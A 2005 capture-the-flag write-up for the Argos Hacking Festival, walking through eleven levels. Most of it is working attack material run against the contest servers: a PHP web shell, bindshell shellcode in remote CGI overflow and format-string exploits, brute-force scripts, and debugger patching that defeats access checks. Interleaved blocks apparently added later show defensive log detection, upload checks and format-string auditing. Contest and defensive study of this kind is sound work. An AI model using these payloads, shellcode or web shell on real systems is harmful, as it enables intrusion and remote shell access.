================================
/                              /
/ Argos Hacking Festival 2005  /
/                     (report) /
================================

[hkpco@ns hkpco]$ whoami
id        / hkpco(monami)
mail&msn  / hkpco@korea.com
homepage  / http://hkpco.kr/
name      / Park Chan Am


| menu |
---------------------------------------------------
  1.  level1   - Brute Force                      |
  2.  level2   - File Upload                      |
  3.  level3   - Debugging                        |
  4.  level4   - Windows Crack                    |
  5.  level5   - Using a Method                   |
  6.  level6   - $-flag Format_String_Bug         |
  7.  level7   - Remote cgi Buffer_Over_Flow      |
  8.  level8   - Remote cgi Format_String_Bug     |
  9.  level9   - Fedora Buffer_Over_Flow          |
  10. level10  - Fedora Format_String_Bug         |
  11. level11  - Rule_find(Sense)                 |
  12. PostScript                                  |
---------------------------------------------------



!!!!!!!!!!!!!!!!!! 1. level1 - Brute Force !!!!!!!!!!!!!!!!!!

/*
	# LEVEL1 #
	Enter the 10000th through 10002nd digits of pi after the decimal point as the password.
*/

level1 is a brute-force problem.
Because the digits can take the form 001, 002, 003, ... , %03d is used to format the number.

- bruteforce.c -

#include <stdio.h>
#include <stdlib.h>

int main( void )
{
	int i;
	char cmd[1024];
	/* try every three-digit value 000..999 as the number parameter */
	for( i=0 ; i<1000 ; i++ )
	{
		sprintf( cmd , "(printf \"GET http://168.188.130.231/level1.php?number=%03d HTTP/1.0\\n\\n\")|nc 168.188.130.231 80" , i );
		system( cmd );
	}
	return 0;
}




[hkpco@localhost ahf]$ cat > bruteforce.c
int main( void )
{
        int i;
        char cmd[1024];
        for( i=0 ; i<1000 ; i++ )
        {
                sprintf( cmd , "(printf \"GET http://168.188.130.231/level1.php?number=%03d HTTP/1.0\\n\\n\")|nc 168.188.130.231 80" , i );
                system( cmd );
        }
}
[hkpco@localhost ahf]$ gcc -o bruteforce bruteforce.c
[hkpco@localhost ahf]$ ./bruteforce > result
[hkpco@localhost ahf]$ cat result | grep "pass"
<font color=blue><b>մϴ. <br><br> level1 password is 'pi=3.141592'<br> ϼ</b></font><br><br><font color=red><b># LEVEL1 #</b></font><br>
[hkpco@localhost ahf]$ 
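From the server side, a sweep like the one above leaves an obvious trace: one client requesting the same script with a steadily changing parameter. The following is an added example (not part of the original writeup) that parses constructed Apache-style access-log lines and flags a client that enumerates a query parameter against one endpoint; the log lines, IPs and thresholds are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Apache common-log shape: client ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    url = urlsplit(target)
    return {"ip": ip, "ts": datetime.strptime(ts, TS_FMT), "method": method,
            "path": url.path,
            "qs": {k: v[0] for k, v in parse_qs(url.query).items()},
            "status": int(status)}

def detect_enumeration(lines, param="number", window=timedelta(seconds=60), threshold=20):
    """Flag (ip, path) pairs that hit one endpoint with at least `threshold`
    distinct values of `param` inside any span of length `window`."""
    per_key = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and param in rec["qs"]:
            per_key[(rec["ip"], rec["path"])].append(rec)
    findings = []
    for (ip, path), recs in per_key.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1            # slide the window forward
            values = {r["qs"][param] for r in recs[start:end + 1]}
            if len(values) >= threshold:
                findings.append({"ip": ip, "path": path,
                                 "requests": end - start + 1,
                                 "distinct_values": len(values)})
                break                 # one finding per client/endpoint is enough
    return findings

# Constructed sample (not real server logs): one client walking number=000..029
# within 30 seconds, plus two ordinary requests from a second client.
SAMPLE_LOG = [
    f'10.0.0.5 - - [22/Jul/2005:11:35:{i:02d} +0000] '
    f'"GET /level1.php?number={i:03d} HTTP/1.0" 200 512'
    for i in range(30)
] + [
    '10.0.0.9 - - [22/Jul/2005:11:35:10 +0000] "GET /level1.php?number=314 HTTP/1.0" 200 512',
    '10.0.0.9 - - [22/Jul/2005:11:35:12 +0000] "GET /index.php HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for f in detect_enumeration(SAMPLE_LOG):
        print(f"enumeration from {f['ip']} on {f['path']}: "
              f"{f['distinct_values']} distinct values in {f['requests']} requests")
```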





!!!!!!!!!!!!!!!!!! level2 - File Upload !!!!!!!!!!!!!!!!!!

/*
	# LEVEL2 #
*/

level2 is a file upload problem.
Uploading files with the php extension has been blocked.
The block is bypassed by uploading with the .ph extension. (Besides *.ph, extensions such as phP and pHp also get past the check.)
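The bypass works because the check compares the literal extension "php" and nothing else. As an added example (not the board's code), the weak denylist check is shown beside an allowlist check that lower-cases the extension and accepts one known-safe suffix only; the allowed set and sample names are assumptions.

```python
import os
import re

# Extensions the upload handler is willing to store (allowlist, lower-case).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "txt"}

def weak_check(filename: str) -> bool:
    """Denylist check of the kind the level2 board appears to use: reject only
    the exact extension 'php'. Case variants and other handler suffixes pass."""
    ext = filename.rsplit(".", 1)[1] if "." in filename else ""
    return ext != "php"

def strong_check(filename: str) -> bool:
    """Allowlist check: exactly one extension, compared case-insensitively,
    and a plain base name so directory parts and odd characters are rejected."""
    base = os.path.basename(filename)
    if base != filename or base.count(".") != 1:
        return False
    name, ext = base.split(".", 1)
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", name):
        return False
    return ext.lower() in ALLOWED_EXTENSIONS

def compare(filenames):
    """Return {filename: (weak_result, strong_result)} to show where they differ."""
    return {f: (weak_check(f), strong_check(f)) for f in filenames}

# Constructed names: the level2 bypass variants plus benign and double-extension cases.
SAMPLES = ["hk.ph", "hk.phP", "hk.pHp", "hk.php", "photo.jpg", "notes.TXT", "a.jpg.php"]

if __name__ == "__main__":
    for f, (w, s) in compare(SAMPLES).items():
        print(f"{f:12} weak={'accept' if w else 'reject':7} strong={'accept' if s else 'reject'}")
```

Storing uploads outside any directory the web server maps to a script handler removes the second half of the problem, whichever name check is used.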

- hk.ph -

<?php
	system($cmd);
?>

(passed as the cmd parameter) cat /usr/local/apache/htdocs/board/data/level2_vkdlfdjq/auth_vkdlfdjqfhem.txt

մϴ.

Level2 password is "SoBored!"

 ϼ.





!!!!!!!!!!!!!!!!!! level3 - Debugging !!!!!!!!!!!!!!!!!!

/*
	# LEVEL3 #
	Log in (SSH) to 168.188.130.231 as guest (password: AHF2005guest);
	level3 is there ^^
*/

level3 is a debugging problem.
The program compares the return value of getuid(), held in %eax, with another user's uid, 0x1f9 (505).
Using gdb, change the register value at that point so the comparison succeeds.

[guest@localhost guest]$ gdb -q level3
(gdb) disassemble main
Dump of assembler code for function main:
0x080483b2 <main+0>:    push   %ebp
0x080483b3 <main+1>:    mov    %esp,%ebp
0x080483b5 <main+3>:    sub    $0x8,%esp
0x080483b8 <main+6>:    and    $0xfffffff0,%esp
0x080483bb <main+9>:    mov    $0x0,%eax
0x080483c0 <main+14>:   sub    %eax,%esp
0x080483c2 <main+16>:   movl   $0x0,0xfffffffc(%ebp)
0x080483c9 <main+23>:   movl   $0x0,0xfffffffc(%ebp)
0x080483d0 <main+30>:   cmpl   $0x63,0xfffffffc(%ebp)
0x080483d4 <main+34>:   jle    0x80483d8 <main+38>
0x080483d6 <main+36>:   jmp    0x80483e9 <main+55>
0x080483d8 <main+38>:   lea    0xfffffffc(%ebp),%eax
0x080483db <main+41>:   incl   (%eax)
0x080483dd <main+43>:   lea    0xfffffffc(%ebp),%eax
0x080483e0 <main+46>:   incl   (%eax)
0x080483e2 <main+48>:   lea    0xfffffffc(%ebp),%eax
0x080483e5 <main+51>:   incl   (%eax)
0x080483e7 <main+53>:   jmp    0x80483d0 <main+30>
0x080483e9 <main+55>:   call   0x804829c <getuid>
//////////   0x080483ee <main+60>:   cmp    $0x1f9,%eax    ////////// point!
0x080483f3 <main+65>:   jne    0x804840c <main+90>
0x080483f5 <main+67>:   sub    $0xc,%esp
0x080483f8 <main+70>:   push   $0x8048516
0x080483fd <main+75>:   call   0x804828c <printf>
0x08048402 <main+80>:   add    $0x10,%esp
0x08048405 <main+83>:   call   0x804835c <foo>
0x0804840a <main+88>:   jmp    0x804841c <main+106>
0x0804840c <main+90>:   sub    $0xc,%esp
0x0804840f <main+93>:   push   $0x8048520
0x08048414 <main+98>:   call   0x804828c <printf>
0x08048419 <main+103>:  add    $0x10,%esp
0x0804841c <main+106>:  mov    $0x0,%eax
0x08048421 <main+111>:  leave
0x08048422 <main+112>:  ret
0x08048423 <main+113>:  nop
End of assembler dump.
(gdb) b *0x080483e9
Breakpoint 1 at 0x80483e9
(gdb) b *0x080483ee
Breakpoint 2 at 0x80483ee
(gdb) r
Starting program: /home/guest/level3

Breakpoint 1, 0x080483e9 in main ()
(gdb) info reg eax
eax            0xbffffb04       -1073743100
(gdb) c
Continuing.

Breakpoint 2, 0x080483ee in main ()
(gdb) info reg eax
eax            0x1f6    502
(gdb) set $eax=505
(gdb) info reg eax
eax            0x1f9    505
(gdb) c
Continuing.
Great!!
level3 password : 999379


Another way to solve it is with ptrace.
I adapted indra's code for this.

http://hkpco.joinc.co.kr/ahf/ptrace.c

[guest@localhost guest]$ gcc -o ptrace ptrace.c -DAHF
[guest@localhost guest]$ ./ptrace
UserName: level3
Great!!
level3 password : 999379





!!!!!!!!!!!!!!!!!! level4 - Windows Crack !!!!!!!!!!!!!!!!!!

/*
	# LEVEL4 #
	Find the serial number of the program!! ^^

	Download: level4.exe
*/

This is a crack problem.
It can be solved with OllyDbg.
Let's walk through how.

1. Open level4.exe

2. Search for -> All referenced text strings -> ASCII "Debugger is detected! program terminated!" (double click)

3. Because the program checks whether a debugger is attached, that part must be bypassed.
   Change JE SHORT level4.0040190F to JMP level4.0040190F.

4. Debug -> Run

5. Enter any value in the program and confirm.

6. In the other window, compare the values shown: STACK ss:[0012f748]=0116740E , EAX=(the value entered).
   The serial is stored at 0116740E.
   Enter the string found at 0116740E into the program.

7. Enter 18248718 ->
   Great!!
   Level 4 password is my password





!!!!!!!!!!!!!!!!!! Level5 - Using a Method !!!!!!!!!!!!!!!!!!

/*
	# LEVEL5 #
	Hint 1 : No HTTP Body is needed.
	Hint 2 : The httpd.conf below is what has to be bypassed.
*/

This problem is solved with an HTTP method, based on the given httpd.conf.
Let's look at the part of httpd.conf that matters to us.

-----------------------------------------------------
SetEnvIf Cookies "we are one" AHF2005

<Directory "/home/level5/public_html/secret_5/">
  Order deny,allow
  deny from all
  allow from env=AHF2005
</Directory>
-----------------------------------------------------

If the Cookies header contains "we are one", the AHF2005 environment variable is set and the request is allowed.
Also pay attention to the hint that no HTTP Body is needed.
If it is not the Body, it must be the Head: the HEAD method.
First, let's check which methods the server supports.

Using the OPTIONS method request program I wrote earlier:
(http://hkpco.joinc.co.kr/socket/options_method.c)

[hkpco@ns socket]$ ./options_method ahf.argos.or.kr
------------------------
|  OPTIONS * HTTP/1.0  |
------------------------

request send result :

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2005 11:35:19 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Connection: close
Content-Type: text/plain


The supported methods are Allow: GET,HEAD,POST,OPTIONS,TRACE.
Among them, sending a HEAD request (the HTTP head rather than the body) returns the password.

[hkpco@ns hkpco]$ telnet ahf.argos.or.kr 80
Trying 168.188.130.239...
Connected to ahf.argos.or.kr.
Escape character is '^]'.
HEAD /~level5/secret_5/ HTTP/1.0
Cookies: AHF2005=we are one

HTTP/1.1 200 OK
Date: Sun, 24 Jul 2005 04:34:11 GMT
Server: Apache
X-Powered-By: PHP/4.4.0
Password : cool guy passket!
Connection: close
Content-Type: text/html

Connection closed by foreign host.





!!!!!!!!!!!!!!!!!! level6 - $-flag Format_String_Bug !!!!!!!!!!!!!!!!!!

/*
	# LEVEL6 #
	Log in (SSH) to 168.188.130.231 as guest (password: AHF2005guest); a file named level6 is there.
*/

This problem is a $-flag fsb (format string bug).
The level6 file in the guest home directory only has r permission.
Since it had no x permission, I copied it and looked at it.

[guest@localhost guest]$ cp level6 a
[guest@localhost guest]$ ls
a  level3  level6  public_html
[guest@localhost guest]$ cat a
6  Ǯ ̾? :)
 /home/level6/level6 ̰  ֽϴ.
̵ Ź帳ϴ!! - binish of AHF2005 -
[level6@localhost level6]$ ls
level6  password

Now let's solve it.

[guest@localhost level6]$ objdump -h level6 | grep ".dtors"
 18 .dtors        00000008  080494f4  080494f4  000004f4  2**2
[guest@localhost guest]$ ./egg
Using address: 0xbfffdef0

------------------
egg: 0xbfffdef0  |
.dtors: 080494f8 |
------------------

+ Increasing the padding one character at a time, the buffer contents showed up at the 7th padding character.
  The attack is based on that position.
  Try removing or adding padding characters one at a time.

[guest@localhost guest]$ /home/level6/level6 AAAA+++++++%96\$8x
AAAA+++++++41414141

* Each time one padding character is removed, the %96\$57049c part must be increased by 1.

/home/level6/level6 `perl -e 'print "\x41\x41\x41\x41\xf8\x94\x04\x08\x41\x41\x41\x41\xfa\x94\x04\x08"'`+++++++%96\$57049c%97\$n%98\$57615c%99\$n


/home/level6/level6 `perl -e 'print "\x41\x41\x41\x41\xf8\x94\x04\x08\x41\x41\x41\x41\xfa\x94\x04\x08"'`++++++%96\$57050c%97\$n%98\$57615c%99\$n


/home/level6/level6 `perl -e 'print "\x41\x41\x41\x41\xf8\x94\x04\x08\x41\x41\x41\x41\xfa\x94\x04\x08"'`+++++%96\$57051c%97\$n%98\$57615c%99\$n


sh-2.05b$ /bin/bash
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[level6@localhost guest]$ id
uid=504(level6) gid=504(guest) groups=502(guest)
[level6@localhost guest]$ cat password
cat: password: 㰡 źε

In this state the password cannot be read.
Use the newgrp command to change the gid to level6.

[level6@localhost level6]$ newgrp
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[level6@localhost level6]$ id
uid=504(level6) gid=504(level6) groups=502(guest)
[level6@localhost level6]$ cat password
մϴ.

level6 password is "MayTheForceBeWithYou!!"

 ϼ





!!!!!!!!!!!!!!!!!! level7 - Remote cgi Buffer_Over_Flow !!!!!!!!!!!!!!!!!!

/*
	# LEVEL7 #
	LOGIN ::
	ID
	PASS
*/

This problem is a remote cgi bof.
When an id and pass are entered, the program reports that the login failed and prints a dump along with it.
The attack code is laid out as

[NOP]
[bindshell]
[bindshell_addr]

The bindshell opens port 30464.
Let's attack.

(terminal1)
[hkpco@localhost bof]$ (perl -e 'print "POST /cgi-bin/level7.cgi HTTP/1.0\nHost: 168.188.130.231\nUser-Agent: HTTPTool/1.0\nContent-Length: 500\n\n","\x90"x16,"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff","\x90"x3,"\xd1\xfa\xff\xbf"x100';cat)|nc 168.188.130.231 80

(terminal2)
[hkpco@ns hkpco]$ telnet 168.188.130.231 30464
Trying 168.188.130.231...
Connected to 168.188.130.231.
Escape character is '^]'.
ls;
dumpcode.h
level7.cgi
level7_qjvjdhqjvmffh
: command not found
cd level7_qjvjdhqjvmffh;
: command not found
ls;
auth_dhqjvmffh.txt
: command not found
cat auth_dhqjvmffh.txt;
մϴ.

level 7 passwd is "ThereIsNoFork!";

 ϼ
: command not found





!!!!!!!!!!!!!!!!!! level8 - Remote cgi Format_String_Bug !!!!!!!!!!!!!!!!!!

/*
	LOGIN
	ID
	PASS
*/


This was my first remote_attack.
Remote cgi Format_String_Bug in Heap Memory, in other words.
Reading passket's `FSB in Heap Memory` is enough to solve this problem.

As passket explained, with printf the addresses change from 0xbf++++++ to 0xc0++++++, which is why this is a heap FSB.
If the program kept the buffer on the stack, it would be a different story.
The attack code:


(the [brute1] and [brute2] bytes are found by brute force)

AAAA[brute1][\x04\x08]CCCC[brute2][\x04\x08]  <- j+2 , i	//16byte

[dummy]		//240byte
----------buf1 , buf2----------
[%08x]x7	//56byte

[%1996c%hn%39068c%hn]  <- j , i		//2byte

[NOP]x100	//100byte

[bind_code]	//177byte


The .dtors address is brute-forced, so the attack was automated.
Once the program runs, connect to the bindshell port (30464).


- remote_attack.c -

#include <stdio.h>
#include <stdlib.h>

int main( void )
{
        int i, j;
        char cmd[2048];

        for(i=0x99;i<0xa0;i++)
                for(j=0x01;j<0xff;j++)
		{
			sprintf( cmd , "printf \"\\n\"|(perl -e 'print \"POST /cgi-bin/level8.cgi HTTP/1.0\\n\",\"Host: 168.188.130.232\\n\",\"Content-Length: 613\\n\\n\",\"AAAA\\x%02x\\x%02x\\x04\\x08CCCC\\x%02x\\x%02x\\x04\\x08\", \"A\"x240,\"%%08x\"x7, \"%%1996c%%hn%%39068c%%hn\" , \"\\x90\"x100,\"\\x31\\xc0\\xb0\\x02\\xcd\\x80\\x85\\xc0\\x75\\x43\\xeb\\x43\\x5e\\x31\\xc0\\x31\\xdb\\x89\\xf1\\xb0\\x02\\x89\\x06\\xb0\\x01\\x89\\x46\\x04\\xb0\\x06\\x89\\x46\\x08\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\x06\\xb0\\x02\\x66\\x89\\x46\\x0c\\xb0\\x77\\x66\\x89\\x46\\x0e\\x8d\\x46\\x0c\\x89\\x46\\x04\\x31\\xc0\\x89\\x46\\x10\\xb0\\x10\\x89\\x46\\x08\\xb0\\x66\\xb3\\x02\\xcd\\x80\\xeb\\x04\\xeb\\x55\\xeb\\x5b\\xb0\\x01\\x89\\x46\\x04\\xb0\\x66\\xb3\\x04\\xcd\\x80\\x31\\xc0\\x89\\x46\\x04\\x89\\x46\\x08\\xb0\\x66\\xb3\\x05\\xcd\\x80\\x88\\xc3\\xb0\\x3f\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb8\\x2f\\x62\\x69\\x6e\\x89\\x06\\xb8\\x2f\\x73\\x68\\x2f\\x89\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xc0\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\x5b\\xff\\xff\\xff\"';cat) | nc 168.188.130.232 80" , j+2 , i , j , i );
			system( cmd );
                }
        return 0;
}
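Both the level6 and the level8 payloads are recognisable on the receiving side: user input that carries %n-family writes, $-positional selectors, or very large field widths is never a legitimate login field. The following is an added example (not from the original writeup) that audits untrusted input for printf directives; the sample payloads are constructed to match the shapes above, and the thresholds are assumptions.

```python
import re

# printf conversion specification: %[index$][flags][width][.prec][length]conv
DIRECTIVE_RE = re.compile(
    r"%(?:(\d+)\$)?[-+ #0]*(\d+)?(?:\.\d+)?(?:hh|h|ll|l|q|j|z|t|L)?([diouxXeEfFgGaAcspn%])"
)

def audit_format_directives(data: bytes) -> dict:
    """Count printf directives in untrusted input: total, %n-family writes,
    $-positional selectors, and the largest width (used for %c padding)."""
    text = data.decode("latin-1")          # 1:1 byte mapping, never fails
    result = {"directives": 0, "n_writes": 0, "positional": 0, "max_width": 0}
    for m in DIRECTIVE_RE.finditer(text):
        index, width, conv = m.groups()
        if conv == "%":                    # literal percent sign
            continue
        result["directives"] += 1
        if conv == "n":
            result["n_writes"] += 1
        if index is not None:
            result["positional"] += 1
        if width is not None:
            result["max_width"] = max(result["max_width"], int(width))
    return result

def is_suspicious(data: bytes, max_directives: int = 3, max_width: int = 512) -> bool:
    """Any %n, any $-selector, many directives, or a huge width is a red flag."""
    r = audit_format_directives(data)
    return (r["n_writes"] > 0 or r["positional"] > 0
            or r["directives"] > max_directives or r["max_width"] > max_width)

# Constructed samples: the shape of the level6 and level8 payloads above,
# plus an ordinary login body and one with a harmless stray percent sign.
SAMPLES = {
    "level6": b"AAAA+++++++%96$57049c%97$n%98$57615c%99$n",
    "level8": b"AAAA\x01\x99\x04\x08CCCC\x01\x99\x04\x08" + b"A" * 240
              + b"%08x" * 7 + b"%1996c%hn%39068c%hn",
    "login":  b"id=guest&pass=example",
    "stray":  b"100% done",
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(name, audit_format_directives(payload), is_suspicious(payload))
```

The real fix is in the cgi itself: call printf("%s", buf) rather than printf(buf); the audit only tells you when someone is probing for the mistake.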

(terminal1)
[hkpco@localhost fsb]$ gcc -o remote_attack remote_attack.c
[hkpco@localhost fsb]$ ./remote_attack >/dev/null

(terminal2)
[hkpco@ns hkpco]$ telnet 168.188.130.232 30464
Trying 168.188.130.232...
Connected to 168.188.130.232.
Escape character is '^]'.
ls;
dumpcode.h
level8.cgi
level8_glqdudduvhapt
: command not found
cd level8_glqdudduvhapt;
: command not found
ls;
auth_eggmelong.txt
: command not found
cat auth_eggmelong.txt;
մϴ.

level8 password is "AnotherWayToMyWay~"

 ϼ





!!!!!!!!!!!!!!!!!! level9 - Fedora Buffer_Over_Flow !!!!!!!!!!!!!!!!!!

/*
	# LEVEL9 #
	Log in (SSH) to 168.188.130.233 as guest (password: guest_ahf2005);
	level9 is there. Good luck!
*/

level9 is a basic Fedora BOF.
I won't explain Fedora BOF in detail here.
Let's just see how it is done.

[guest@localhost guest]$ cat /etc/*release
Fedora Core release 2 (Tettnang)
Fedora Core release 2 (Tettnang)
// Fedora confirmed

[guest@localhost .hk]$ gdb -q /home/guest/level9
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80485e0
(gdb) r
Starting program: /home/guest/level9
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: No such file or directory.
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared library symbols:
: No such file or directory.
Error while reading shared library symbols:
: No such file or directory.

Breakpoint 1, 0x080485e0 in main ()
(gdb) disassemble execl
Dump of assembler code for function execl:
0x00197a00 <execl+0>:   push   %ebp
0x00197a01 <execl+1>:   mov    %esp,%ebp
[ 0x00197a03 <execl+3>:   lea    0x10(%ebp),%eax ] // the point!
.
.
.
---Type <return> to continue, or q <return> to quit---q
Quit


[guest@localhost .hk]$ gdb -q /home/guest/level9
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80485e0
(gdb) r
Starting program: /home/guest/level9
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: No such file or directory.
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared library symbols:
: No such file or directory.
Error while reading shared library symbols:
: No such file or directory.

Breakpoint 1, 0x080485e0 in main ()
(gdb) x/50x 0x8049000
0x8049000:      0x464c457f      0x00010101      0x00000000      0x00000000
0x8049010:      0x00030002      0x00000001      0x080482c0      0x00000034
0x8049020:      0x00000788      0x00000000      0x00200034      0x00280007
0x8049030:      0x0019001c      0x00000006      0x00000034      0x08048034
0x8049040:      0x08048034      0x000000e0      0x000000e0      0x00000005
0x8049050:      0x00000004      0x00000003      0x00000114      0x08048114
0x8049060:      0x08048114      0x00000013      0x00000013      0x00000004
0x8049070:      0x00000001      0x00000001      0x00000000      0x08048000
0x8049080:      0x08048000      0x0000047c      0x0000047c      0x00000005
0x8049090:      0x00001000      0x00000001      0x0000047c      0x0804947c
0x80490a0:      0x0804947c      0x00000100      0x00000104      0x00000006
0x80490b0:      0x00001000      0x00000002      0x00000490      0x08049490
0x80490c0:      0x08049490      0x000000c8
(gdb)
.
.
.
0x8049560 <_GLOBAL_OFFSET_TABLE_+4>:    0x0095f4d0      0x00954830      0x009769f0      0x080482b6
(gdb) x/8x 0x8049564
0x8049564 <_GLOBAL_OFFSET_TABLE_+8>:    0x00954830   [   0x009769f0      0x080482b6      0x00000000   ] // the point!
0x8049574 <__dso_handle>:       0x00000000      0x08049488      0x00000000      0x00000000

(gdb) x/8x 0x009769f0
0x9769f0 <__libc_start_main>:   [0x57e58955      0xec835356      0x0c458b4c      0xe810558b] // the point!
0x976a00 <__libc_start_main+16>:        [0xffffff09      0x25f8c381]      0x7d8b00[10]      0x1c758b18 // the point!

[guest@localhost .hk]$ cat > sh.c
#include <unistd.h>

int main( void )
{
        setreuid(geteuid(),geteuid());
        setregid(getegid(),getegid());
        execl("/bin/sh", "sh", (char *)0);
        return 0;
}
[guest@localhost .hk]$ gcc -o sh sh.c
[guest@localhost .hk]$ ln -s ./sh "`perl -e 'print "\x55\x89\xe5\x57\x56\x53\x83\xec\x4c\x8b\x45\x0c\x8b\x55\x10\xe8\x09\xff\xff\xff\x81\xc3\xf8\x25\x10"'`"
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
        LANGUAGE = (unset),
        LC_ALL = (unset),
        LANG = "euc_KR"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
[guest@localhost .hk]$ ls
U??WVS??L?E??U?????????%?  sh  sh.c

[guest@localhost .hk]$ gdb -q /home/guest/level9_vul
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) disassemble main
Dump of assembler code for function main:
0x08048370 <main+0>:    push   %ebp
0x08048371 <main+1>:    mov    %esp,%ebp
0x08048373 <main+3>:    sub    $0x108,%esp  <- 0x108==264
.
.
.
(gdb) quit

The attack payload is laid out as follows.
| dummy(264byte) | execl's first argument - 8 | (execl+3)_addr |

Now let's attack.


[guest@localhost .hk]$ /home/guest/level9_vul "`perl -e 'print "A"x264,"\x60\x95\x04\x08","\x03\x7a\x19"'`"
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
        LANGUAGE = (unset),
        LC_ALL = (unset),
        LANG = "euc_KR"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
sh-2.05b$ id
uid=504(guest) gid=501(level9) groups=504(guest)
sh-2.05b$ cat /home/guest/level9_password
մϴ.

Level9 password id "FeDoRaCoRe2 was broken!"

 ϼ





!!!!!!!!!!!!!!!!!! level10 - Fedora Format_String_Bug !!!!!!!!!!!!!!!!!!

/*
	# LEVEL10 #
	Log in (SSH) to 168.188.130.233 as guest2 (password: guest2_ahf2005);
	level10 is there. Good luck!!
*/

level10... it seems that of the people who tried it, few solved it.
Let's look at the approach I used in the attack.

1/ .dtors
2/ overwrite .dtors with the address of the library's exec* function
3/ code arranged so that the address can be found in one go

With that, let's exploit.

- brute_ffsb.c -

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main( void )
{
	int i=34562;
	char cmd[1024];

	while(1)
	{
		sprintf(cmd,"strace /home/guest2/level10_vul `perl -e 'print \"AAAA\\xa6\\x94\\x04\\x08CCCC\\xa4\\x94\\x04\\x08\",\"%%08x\"x7,\"%%86c%%hn%%%dc%%hn\",\"BB\"'`",i);
		system( cmd );
		printf ("%s",cmd);
		
		i++;
		getchar();
	}
}


strace was used to check the execve system call.
Running brute_ffsb, I watched whether execve was called and used the fact that it returns -1 (when no file exists at that path) to find the right value.
The following program creates the link whose name is the byte sequence at the target address.

- link.c -

#include <unistd.h>

int main( void )
{
	/* the link name is the raw byte sequence that execve will be handed as the path */
	symlink( "./shell" , "\xA1\x64\x96\x04\x08\x8B\x10\x85\xD2\x75\xEB\xC6\x05\x68\x96\x04\x08\x01\xC9\xC3\x89\xF6\x55\x89\xE5\x83\xEC\x08\xA1\x70\x95\x04\x08\x85\xC0\x74\x19\xB8" );
	return 0;
}


[guest2@localhost .test]$ ../level10_vul `perl -e 'print "AAAA\x6e\x95\x04\x08CCCC\x6c\x95\x04\x08","%08x"x7,"%86c%hn%34794c%hn"'`
.
.
.
                                $ id
uid=505(guest2) gid=505(guest2) egid=502(level10) groups=505(guest2)
$ cat /home/guest2/level10_password
Wow..

level10 password is "is It possible st1ll?"





!!!!!!!!!!!!!!!!!! level11 - Rule_find(Sense) !!!!!!!!!!!!!!!!!!

/*
	# LEVEL11 #
	HINT : 168.188.130.232 port 7979 is open.
	Solving it takes a bit of sense (?) rather than skill.
	Anyway.. good luck!
*/

This problem returns the entered string transformed by a particular rule.
Find the rule and craft input so that AHF2005 comes out.
The server program returns the input with 7 subtracted from each character's ASCII value.
So the code below finds the string that yields AHF2005.

- rule.c -

#include <stdio.h>

int main( void )
{
        /* add 7 to each character so the server's ASCII-7 rule gives back AHF2005 */
        printf( "%c%c%c%c%c%c%c\n" ,'A'+7,'H'+7,'F'+7,'2'+7,'0'+7,'0'+7,'5'+7 );
        return 0;
}


[hkpco@ns ahf]$ gcc -o rule rule.c
[hkpco@ns ahf]$ ./rule
HOM977<

So let's enter HOM977< and see.

